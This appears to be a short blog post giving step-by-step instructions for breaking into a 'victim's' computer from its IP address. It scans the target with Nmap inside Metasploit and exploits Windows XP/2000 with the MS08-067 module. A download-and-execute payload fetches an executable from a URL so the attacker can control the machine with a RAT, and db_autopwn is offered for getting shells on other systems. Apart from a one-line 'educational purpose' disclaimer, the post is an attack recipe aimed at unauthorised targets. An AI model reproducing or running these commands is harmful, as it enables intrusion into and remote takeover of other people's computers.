IP Address...
Note :- This Is For Only Educational Purpuse...
Requirements:
1).Nmap
2).Metasploit
Step:-
First of all you need target IP of your victim. Then open Metasploit Console & type db_create. Once you do that type Nmap.
Next you need to type :- Code: db_nmap -sT -sV <target ip>
[This’ll scan OS, Ports, and Services running on victim’s computer.] Wait for 5 min’s to complete its scan.
Once done, Note down the OS, Ports, and Services running on victim’s computer. Now it’s time to exploit victim’s machine. Exploit depends on the OS, Ports, and Services running on victim’s computer. So, you’re lucky if you get OS WIN XP or 2000 because it’s easy to exploit them. No matter weather they’re protected by any firewall or not.
br: Now I’ll tell you exploiting:- Windows 2000 (all versions SP1, SP2, SP3, SP4) Windows XP (all versions SP1, SP2, SP3)
Type show exploits
Next you need to type use Code: windows/smb/ms08_067_netapi.
Now Type show targets Now Type set target 0->This’ll set target to 0 specified. Then type show payloads Next type
Code: set payload windows/download_exec.
Then Type show options. In window you’ll see many options, in which you need to Fill only two options RHOST & URL.
Type Code: set RHOST <xxx.xxx.xxx.xxx >
Next Type
Code: set URL http://www.xxxx.com/xxx.exe
At last you need to type exploit.
You can now control you're victim with RAT.
So, any versions of Win 2000-XP can be exploited easily. In case if you didn’t get this two OS’, immediately after Nmap scan You can use the command
Code: db_autopwn –p –t –e.
U Will discover the SHELL In most cases.
Thankyou !!!
No comments:
Post a Comment